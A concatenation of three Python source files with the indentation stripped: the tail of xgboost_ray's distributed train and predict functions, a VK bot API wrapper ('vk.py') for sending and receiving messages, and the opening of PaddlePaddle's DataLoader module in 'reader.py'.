total_n = sum(res["train_n"] or 0 for res in all_results)
_training_state.additional_results["total_n"] = total_n
return bst, evals_result, _training_state.additional_results
@PublicAPI(stability="beta")
def train(
params: Dict,
dtrain: RayDMatrix,
num_boost_round: int = 10,
*args,
evals: Union[List[Tuple[RayDMatrix, str]], Tuple[RayDMatrix, str]] = (
),
evals_result: Optional[Dict] = None,
additional_results: Optional[Dict] = None,
ray_params: Union[None, RayParams, Dict] = None,
_remote: Optional[bool] = None,
**kwargs) -> xgb.Booster:
"""Distributed XGBoost training via Ray.
This function will connect to a Ray cluster, create ``num_actors``
remote actors, send data shards to them, and have them train an
XGBoost classifier. The XGBoost parameters will be shared and combined
via Rabit's all-reduce protocol.
If running inside a Ray Tune session, this function will automatically
handle results to tune for hyperparameter search.
Failure handling:
XGBoost on Ray supports automatic failure handling that can be configured
with the :class:`ray_params <RayParams>` argument. If an actor or local
training task dies, the Ray actor is marked as dead, and there are
three options on how to proceed.
First, if ``ray_params.elastic_training`` is ``True`` and
the number of dead actors is below ``ray_params.max_failed_actors``,
training will continue right away with fewer actors. No data will be
loaded again and the latest available checkpoint will be used.
A maximum of ``ray_params.max_actor_restarts`` restarts will be tried
before exiting.
Second, if ``ray_params.elastic_training`` is ``False`` and
the number of restarts is below ``ray_params.max_actor_restarts``,
Ray will try to schedule the dead actor again, load the data shard
on this actor, and then continue training from the latest checkpoint.
Third, if none of the above is the case, training is aborted.
Args:
params (Dict): parameter dict passed to ``xgboost.train()``
dtrain (RayDMatrix): Data object containing the training data.
evals (Union[List[Tuple[RayDMatrix, str]], Tuple[RayDMatrix, str]]):
``evals`` tuple passed to ``xgboost.train()``.
evals_result (Optional[Dict]): Dict to store evaluation results in.
additional_results (Optional[Dict]): Dict to store additional results.
ray_params (Union[None, RayParams, Dict]): Parameters to configure
Ray-specific behavior. See :class:`RayParams` for a list of valid
configuration parameters.
_remote (bool): Whether to run the driver process in a remote
function. This is enabled by default in Ray client mode.
**kwargs: Keyword arguments will be passed to the local
`xgb.train()` calls.
Returns: An ``xgboost.Booster`` object.
"""
os.environ.setdefault("RAY_IGNORE_UNHANDLED_ERRORS", "1")
if xgb is None:
raise ImportError(
"xgboost package is not installed. XGBoost-Ray WILL NOT WORK. "
"FIX THIS by running `pip install \"xgboost-ray\"`.")
if _remote is None:
_remote = _is_client_connected() and \
not is_session_enabled()
if not ray.is_initialized():
ray.init()
if _remote:
# Run this function as a remote function to support Ray client mode.
@ray.remote(num_cpus=0)
def _wrapped(*args, **kwargs):
_evals_result = {}
_additional_results = {}
bst = train(
*args,
num_boost_round=num_boost_round,
evals_result=_evals_result,
additional_results=_additional_results,
**kwargs)
return bst, _evals_result, _additional_results
# Make sure that train is called on the server node.
_wrapped = force_on_current_node(_wrapped)
bst, train_evals_result, train_additional_results = ray.get(
_wrapped.remote(
params,
dtrain,
*args,
evals=evals,
ray_params=ray_params,
_remote=False,
**kwargs,
))
if isinstance(evals_result, dict):
evals_result.update(train_evals_result)
if isinstance(additional_results, dict):
additional_results.update(train_additional_results)
return bst
_maybe_print_legacy_warning()
# may raise TypeError
_validate_kwargs_for_func(kwargs, xgb.train, "xgb.train()")
start_time = time.time()
ray_params = _validate_ray_params(ray_params)
max_actor_restarts = ray_params.max_actor_restarts \
if ray_params.max_actor_restarts >= 0 else float("inf")
_assert_ray_support()
if not isinstance(dtrain, RayDMatrix):
raise ValueError(
"The `dtrain` argument passed to `train()` is not a RayDMatrix, "
"but of type {}. "
"\nFIX THIS by instantiating a RayDMatrix first: "
"`dtrain = RayDMatrix(data=data, label=label)`.".format(
type(dtrain)))
added_tune_callback = _try_add_tune_callback(kwargs)
# Tune currently does not support elastic training.
if added_tune_callback and ray_params.elastic_training and not bool(
os.getenv("RXGB_ALLOW_ELASTIC_TUNE", "0")):
raise ValueError("Elastic Training cannot be used with Ray Tune. "
"Please disable elastic_training in RayParams in "
"order to use xgboost_ray with Tune.")
if added_tune_callback:
# Don't autodetect resources when used with Tune.
cpus_per_actor = ray_params.cpus_per_actor
gpus_per_actor = max(0, ray_params.gpus_per_actor)
else:
cpus_per_actor, gpus_per_actor = _autodetect_resources(
ray_params=ray_params,
use_tree_method="tree_method" in params
and params["tree_method"] is not None
and params["tree_method"].startswith("gpu"))
tree_method = params.get("tree_method", "auto") or "auto"
# preemptively raise exceptions with bad params
if tree_method == "exact":
raise ValueError(
"`exact` tree method doesn't support distributed training.")
if params.get("updater", None) == "grow_colmaker":
raise ValueError(
"`grow_colmaker` updater doesn't support distributed training.")
if gpus_per_actor > 0 and not tree_method.startswith("gpu_"):
warnings.warn(
f"GPUs have been assigned to the actors, but the current XGBoost "
f"tree method is set to `{tree_method}`. Thus, GPUs will "
f"currently not be used. To enable GPUs usage, please set the "
f"`tree_method` to a GPU-compatible option, "
f"e.g. `gpu_hist`.")
if gpus_per_actor == 0 and cpus_per_actor == 0:
raise ValueError("cpus_per_actor and gpus_per_actor both cannot be "
"0. Are you sure your cluster has CPUs available?")
if ray_params.elastic_training and ray_params.max_failed_actors == 0:
raise ValueError(
"Elastic training enabled but the maximum number of failed "
"actors is set to 0. This means that elastic training is "
"effectively disabled. Please set `RayParams.max_failed_actors` "
"to something larger than 0 to enable elastic training.")
if ray_params.elastic_training and ray_params.max_actor_restarts == 0:
raise ValueError(
"Elastic training enabled but the maximum number of actor "
"restarts is set to 0. This means that elastic training is "
"effectively disabled. Please set `RayParams.max_actor_restarts` "
"to something larger than 0 to enable elastic training.")
if not dtrain.has_label:
raise ValueError(
"Training data has no label set. Please make sure to set "
"the `label` argument when initializing `RayDMatrix()` "
"for data you would like to train on.")
if not dtrain.loaded and not dtrain.distributed:
dtrain.load_data(ray_params.num_actors)
for (deval, _name) in evals:
if not deval.has_label:
raise ValueError(
"Evaluation data has no label set. Please make sure to set "
"the `label` argument when initializing `RayDMatrix()` "
"for data you would like to evaluate on.")
if not deval.loaded and not deval.distributed:
deval.load_data(ray_params.num_actors)
bst = None
train_evals_result = {}
train_additional_results = {}
tries = 0
checkpoint = _Checkpoint() # Keep track of latest checkpoint
current_results = {} # Keep track of additional results
actors = [None] * ray_params.num_actors # All active actors
pending_actors = {}
# Create the Queue and Event actors.
queue, stop_event = _create_communication_processes(added_tune_callback)
placement_strategy = None
if not ray_params.elastic_training:
if added_tune_callback:
if TUNE_USING_PG:
# If Tune is using placement groups, then strategy has already
# been set. Don't create an additional placement_group here.
placement_strategy = None
else:
placement_strategy = "PACK"
elif bool(ENV.USE_SPREAD_STRATEGY):
placement_strategy = "SPREAD"
if placement_strategy is not None:
pg = _create_placement_group(cpus_per_actor, gpus_per_actor,
ray_params.resources_per_actor,
ray_params.num_actors, placement_strategy)
else:
pg = None
start_actor_ranks = set(range(ray_params.num_actors)) # Start these
total_training_time = 0.
boost_rounds_left = num_boost_round
last_checkpoint_value = checkpoint.value
while tries <= max_actor_restarts:
# Only update number of iterations if the checkpoint changed
# If it didn't change, we already subtracted the iterations.
if checkpoint.iteration >= 0 and \
checkpoint.value != last_checkpoint_value:
boost_rounds_left -= checkpoint.iteration + 1
last_checkpoint_value = checkpoint.value
logger.debug(f"Boost rounds left: {boost_rounds_left}")
training_state = _TrainingState(
actors=actors,
queue=queue,
stop_event=stop_event,
checkpoint=checkpoint,
additional_results=current_results,
training_started_at=0.,
placement_group=pg,
failed_actor_ranks=start_actor_ranks,
pending_actors=pending_actors)
try:
bst, train_evals_result, train_additional_results = _train(
params,
dtrain,
boost_rounds_left,
*args,
evals=evals,
ray_params=ray_params,
cpus_per_actor=cpus_per_actor,
gpus_per_actor=gpus_per_actor,
_training_state=training_state,
**kwargs)
if training_state.training_started_at > 0.:
total_training_time += time.time(
) - training_state.training_started_at
break
except (RayActorError, RayTaskError) as exc:
if training_state.training_started_at > 0.:
total_training_time += time.time(
) - training_state.training_started_at
alive_actors = sum(1 for a in actors if a is not None)
start_again = False
if ray_params.elastic_training:
if alive_actors < ray_params.num_actors - \
ray_params.max_failed_actors:
raise RuntimeError(
"A Ray actor died during training and the maximum "
"number of dead actors in elastic training was "
"reached. Shutting down training.") from exc
# Do not start new actors before resuming training
# (this might still restart actors during training)
start_actor_ranks.clear()
if exc.__cause__ and isinstance(exc.__cause__,
RayXGBoostActorAvailable):
# New actor available, integrate into training loop
logger.info(
f"A new actor became available. Re-starting training "
f"from latest checkpoint with new actor. "
f"This will use {alive_actors} existing actors and "
f"start {len(start_actor_ranks)} new actors. "
f"Sleeping for 10 seconds for cleanup.")
tries -= 1 # This is deliberate so shouldn't count
start_again = True
elif tries + 1 <= max_actor_restarts:
if exc.__cause__ and isinstance(exc.__cause__,
RayXGBoostTrainingError):
logger.warning(f"Caught exception: {exc.__cause__}")
logger.warning(
f"A Ray actor died during training. Trying to "
f"continue training on the remaining actors. "
f"This will use {alive_actors} existing actors and "
f"start {len(start_actor_ranks)} new actors. "
f"Sleeping for 10 seconds for cleanup.")
start_again = True
elif tries + 1 <= max_actor_restarts:
if exc.__cause__ and isinstance(exc.__cause__,
RayXGBoostTrainingError):
logger.warning(f"Caught exception: {exc.__cause__}")
logger.warning(
f"A Ray actor died during training. Trying to restart "
f"and continue training from last checkpoint "
f"(restart {tries + 1} of {max_actor_restarts}). "
f"This will use {alive_actors} existing actors and start "
f"{len(start_actor_ranks)} new actors. "
f"Sleeping for 10 seconds for cleanup.")
start_again = True
if start_again:
time.sleep(5)
queue.shutdown()
stop_event.shutdown()
time.sleep(5)
queue, stop_event = _create_communication_processes()
else:
raise RuntimeError(
f"A Ray actor died during training and the maximum number "
f"of retries ({max_actor_restarts}) is exhausted."
) from exc
tries += 1
total_time = time.time() - start_time
train_additional_results["training_time_s"] = total_training_time
train_additional_results["total_time_s"] = total_time
logger.info("[RayXGBoost] Finished XGBoost training on training data "
"with total N={total_n:,} in {total_time_s:.2f} seconds "
"({training_time_s:.2f} pure XGBoost training time).".format(
**train_additional_results))
_shutdown(
actors=actors,
pending_actors=pending_actors,
queue=queue,
event=stop_event,
placement_group=pg,
force=False)
if isinstance(evals_result, dict):
evals_result.update(train_evals_result)
if isinstance(additional_results, dict):
additional_results.update(train_additional_results)
return bst
def _predict(model: xgb.Booster, data: RayDMatrix, ray_params: RayParams,
**kwargs):
_assert_ray_support()
if not ray.is_initialized():
ray.init()
# Create remote actors
actors = [
_create_actor(
rank=i,
num_actors=ray_params.num_actors,
num_cpus_per_actor=ray_params.cpus_per_actor,
num_gpus_per_actor=ray_params.gpus_per_actor
if ray_params.gpus_per_actor >= 0 else 0,
resources_per_actor=ray_params.resources_per_actor,
distributed_callbacks=ray_params.distributed_callbacks)
for i in range(ray_params.num_actors)
]
logger.info(f"[RayXGBoost] Created {len(actors)} remote actors.")
# Split data across workers
wait_load = []
for actor in actors:
wait_load.extend(_trigger_data_load(actor, data, []))
try:
ray.get(wait_load)
except Exception as exc:
logger.warning(f"Caught an error during prediction: {str(exc)}")
_shutdown(actors, force=True)
raise
# Put model into object store
model_ref = ray.put(model)
logger.info("[RayXGBoost] Starting XGBoost prediction.")
# Train
fut = [actor.predict.remote(model_ref, data, **kwargs) for actor in actors]
try:
actor_results = ray.get(fut)
except Exception as exc:
logger.warning(f"Caught an error during prediction: {str(exc)}")
_shutdown(actors=actors, force=True)
raise
_shutdown(actors=actors, force=False)
return combine_data(data.sharding, actor_results)
@PublicAPI(stability="beta")
def predict(model: xgb.Booster,
data: RayDMatrix,
ray_params: Union[None, RayParams, Dict] = None,
_remote: Optional[bool] = None,
**kwargs) -> Optional[np.ndarray]:
"""Distributed XGBoost predict via Ray.
This function will connect to a Ray cluster, create ``num_actors``
remote actors, send data shards to them, and have them predict labels
using an XGBoost booster model. The results are then combined and
returned.
Args:
model (xgb.Booster): Booster object to call for prediction.
data (RayDMatrix): Data object containing the prediction data.
ray_params (Union[None, RayParams, Dict]): Parameters to configure
Ray-specific behavior. See :class:`RayParams` for a list of valid
configuration parameters.
_remote (bool): Whether to run the driver process in a remote
function. This is enabled by default in Ray client mode.
**kwargs: Keyword arguments will be passed to the local
`xgb.predict()` calls.
Returns: ``np.ndarray`` containing the predicted labels.
"""
os.environ.setdefault("RAY_IGNORE_UNHANDLED_ERRORS", "1")
if xgb is None:
raise ImportError(
"xgboost package is not installed. XGBoost-Ray WILL NOT WORK. "
"FIX THIS by running `pip install \"xgboost-ray\"`.")
if _remote is None:
_remote = _is_client_connected() and \
not is_session_enabled()
if not ray.is_initialized():
ray.init()
if _remote:
return ray.get(
ray.remote(num_cpus=0)(predict).remote(
model, data, ray_params, _remote=False, **kwargs))
_maybe_print_legacy_warning()
ray_params = _validate_ray_params(ray_params)
max_actor_restarts = ray_params.max_actor_restarts \
if ray_params.max_actor_restarts >= 0 else float("inf")
_assert_ray_support()
if not isinstance(data, RayDMatrix):
raise ValueError(
"The `data` argument passed to `train()` is not a RayDMatrix, "
"but of type {}. "
"\nFIX THIS by instantiating a RayDMatrix first: "
"`data = RayDMatrix(data=data)`.".format(type(data)))
tries = 0
while tries <= max_actor_restarts:
try:
return _predict(model, data, ray_params=ray_params, **kwargs)
except RayActorError:
if tries + 1 <= max_actor_restarts:
logger.warning(
"A Ray actor died during prediction. Trying to restart "
"prediction from scratch. "
"Sleeping for 10 seconds for cleanup.")
time.sleep(10)
else:
raise RuntimeError(
"A Ray actor died during prediction and the maximum "
"number of retries ({}) is exhausted.".format(
max_actor_restarts))
tries += 1
return None
|
vk.py | # -*- coding: utf-8 -*-
import asyncio
import collections
import functools
import json
import time
from typing import List, Optional
from threading import Thread
from vk_api import VkApi
from vk_api.bot_longpoll import VkBotEventType, VkBotLongPoll
from vk_api.execute import VkFunction
from vk_api.upload import VkUpload
from vk_api.utils import get_random_id
API_VERSION = '5.130'
vk_execute = VkFunction(
args=('methods',),
clean_args=('methods',),
code='''
%(methods)s;
return 1;
''')
def threaded(fn):
def wrapper(*args, **kwargs):
Thread(target=fn, args=args, kwargs=kwargs, daemon=True).start()
return wrapper
class VKMessage:
__slots__ = ('id', 'peer_id', 'user_id', 'text', 'payload', 'reply')
def __init__(self, raw: dict, vk: 'VK') -> None:
self.id = raw['id']
self.peer_id = raw['peer_id']
self.user_id = raw['from_id']
self.text = raw['text']
self.payload = json.loads(raw['payload']) if 'payload' in raw else None
self.reply = functools.partial(vk.send, self.peer_id)
class VK:
__slots__ = ('vk', 'logger', 'event_queue', 'msg_queue', 'user_cache', 'group_id')
def __init__(self, token: str, logger) -> None:
self.vk = VkApi(token=token, api_version=API_VERSION)
self.logger = logger
self.event_queue = collections.deque()
self.msg_queue = []
self.user_cache = {}
self.group_id = self.method('groups.getById')[0]['id']
self.init_group_settings()
def method(self, method: str, args: dict = None) -> dict:
return self.vk.method(method, args)
def send(self, peer_id: int, message: str, keyboard=None, attach=None, sticker=None, disable_mentions=True) -> None:
if 4000 < len(message) < 100000 and (not attach) and (not sticker):
for message_part in [message[j:j + 4000] for j in range(0, len(message), 4000)]:
self.msg_queue.append({'peer_id': peer_id, 'message': message_part, 'random_id': get_random_id(), 'disable_mentions': disable_mentions,
'keyboard': keyboard})
else:
self.msg_queue.append({'peer_id': peer_id, 'message': message, 'random_id': get_random_id(), 'disable_mentions': disable_mentions,
'keyboard': keyboard, 'attachment': attach, 'sticker_id': sticker})
def send_multiple(self, peer_ids: List[int], message: str, keyboard=None, disable_mentions=True) -> None:
self.msg_queue.append({'peer_ids': peer_ids, 'message': message, 'random_id': get_random_id(), 'disable_mentions': disable_mentions,
'keyboard': keyboard})
def get_user_link(self, target_id: int, name_case: str = 'nom') -> str:
if target_id not in self.user_cache and target_id != 0:
if target_id < 0:
self.user_cache[target_id] = self.method('groups.getById', {'group_id': -target_id})[0]
else:
self.user_cache[target_id] = self.method('users.get', {'user_ids': target_id, 'name_case': name_case})[0]
if target_id < 0:
return ''.join(['[id', str(target_id), '|', self.user_cache[target_id]['first_name'], ']'])
elif target_id == 0:
return '@id0'
else:
self.user_cache[target_id] = self.method('users.get', {'user_ids': target_id, 'name_case': name_case})[0]
return f"[id{target_id}|{self.user_cache[target_id]['first_name']}]"
def get_user_links(self, target_ids: List[int]) -> dict:
cached = True
for i in target_ids:
if i not in self.user_cache:
cached = False
break
if not cached:
for i in self.method('users.get', {'user_ids': ','.join(list(map(str, target_ids)))}):
self.user_cache[i['id']] = i
return {i: f"[id{i}|{self.user_cache[i]['first_name']}]" for i in target_ids}
def get_target_id(self, s: str) -> Optional[int]:
r = s.replace('https://', '').replace('vk.com/', '').replace('@id', '').replace('@', '').replace('[', '').replace(']', '')
if '|' in r:
r = r.split('|')[0]
if not r.isdecimal():
r = self.method('utils.resolveScreenName', {'screen_name': r.replace('-', 'club')})
if not r:
return
if r['type'] == 'user':
r = r['object_id']
elif r['type'] == 'group':
r = -r['object_id']
return int(r)
def is_chat_member(self, peer_id: int, user_id: int) -> bool:
members = self.method('messages.getConversationMembers', {'peer_id': peer_id})['items']
for i in members:
if i['member_id'] == user_id:
return True
def is_chat_admin(self, peer_id: int, user_id: int, check_if_owner: bool = False) -> bool:
members = self.method('messages.getConversationMembers', {'peer_id': peer_id})['items']
for i in members:
if i['member_id'] == user_id and 'is_admin' in i and i['is_admin'] and ((not check_if_owner) or ('is_owner' in i and i['is_owner'])):
return True
def get_chat_owner(self, peer_id: int) -> Optional[int]:
members = self.method('messages.getConversationMembers', {'peer_id': peer_id})['items']
for i in members:
if 'is_owner' in i and i['is_owner']:
return i['member_id']
def get_upload(self) -> VkUpload:
return VkUpload(self.vk)
def init_group_settings(self) -> None:
self.method('groups.setSettings', {
'group_id': self.group_id,
'messages': 1,
'bots_capabilities': 1,
'bots_start_button': 1,
'bots_add_to_chat': 1,
})
self.method('groups.setLongPollSettings', {
'group_id': self.group_id,
'enabled': 1,
'api_version': API_VERSION,
'message_new': 1,
})
async def messages_sender(self) -> None:
while True:
queue = self.msg_queue[:25]
if queue:
self.msg_queue = self.msg_queue[25:]
try:
vk_execute(self.vk, ''.join(('API.messages.send(' + json.dumps(i, ensure_ascii=False, separators=(',', ':')) + ');') for i in queue))
except Exception as ex:
self.logger.warning('Произошла ошибка при отправке сообщений', exc_info=ex)
await asyncio.sleep(0.05)
@threaded
def event_handler(self) -> None:
convs = self.method('messages.getConversations', {'count': 200, 'filter': 'unanswered'})['items']
for i in convs:
self.event_queue.append(VKMessage(i['last_message'], self))
lp = VkBotLongPoll(self.vk, self.group_id)
while True:
try:
for event in lp.check():
if event.type == VkBotEventType.MESSAGE_NEW:
self.event_queue.append(VKMessage(event.raw['object']['message'], self))
else:
self.event_queue.append(event)
except Exception as ex:
self.logger.warning('Произошла ошибка в LongPoll', exc_info=ex)
time.sleep(3)
|
reader.py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
from .framework import _get_paddle_place, _get_paddle_place_list
from paddle.fluid.framework import _set_expected_place, _current_expected_place
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
import queue
# NOTE: [ avoid hanging & failed quickly ] These value is used in getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
DataLoader prodives an iterator which iterates given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-prcess data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style dataset and iterable-style dataset.
For map-style datast(can get a sample from dataset with a given
index), please see :code:`paddle.io.Dataset`.
For iterable-style datast(get samples from dataset iteratively,
like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
.. note::
GPU tensor operation is not supported in subprocess currently,
please don't use GPU tensor operations in pipeline which will
be performed in subprocess, such as dataset transforms, collte_fn,
etc. Numpy array and CPU tensor operation is supported.
**Disable automatic batching**
In certain cases such as some NLP tasks, instead of automatic batching,
handling batching manually in dataset is needed by users. For these
cases, automatic batching is disabled if both :attr:`batch_size` and
:attr:`batch_sampler` is set as None, each data got from :attr:`dataset`
should be batched data and will be processed with function define by
:attr:`collate_fn` or :attr:`default_collate_fn`.
.. note::
When automatic batching is disabled, :attr:`default_collate_fn` will
do nothing to data from dataset.
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|list(str)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None. If ``places`` is list of string,
the string in the list can be ``cpu``, ``gpu:x`` and ``gpu_pinned``,
where ``x`` is the index of the GPUs.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed Tensors. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default True.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int|None): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whther to shuffle indices order before genrate
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating sysytem) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data form output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subproces starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each elemnet of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=True,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None,
persistent_workers=False):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
self.batch_size = None
elif batch_size is None:
self.batch_sampler = None
self.batch_size = None
else:
assert batch_size > 0, \
"batch_size should be None or a positive value when " \
"batch_sampler is not given"
self.batch_size = batch_size
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.drop_last = drop_last
self.auto_collate_batch = self.batch_sampler is not None
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
self._persistent_workers = persistent_workers
self._iterator = None
def __len__(self):
if self.dataset_kind == _DatasetKind.ITER:
raise ValueError("length of IterableDataset not supported")
else:
if self.auto_collate_batch:
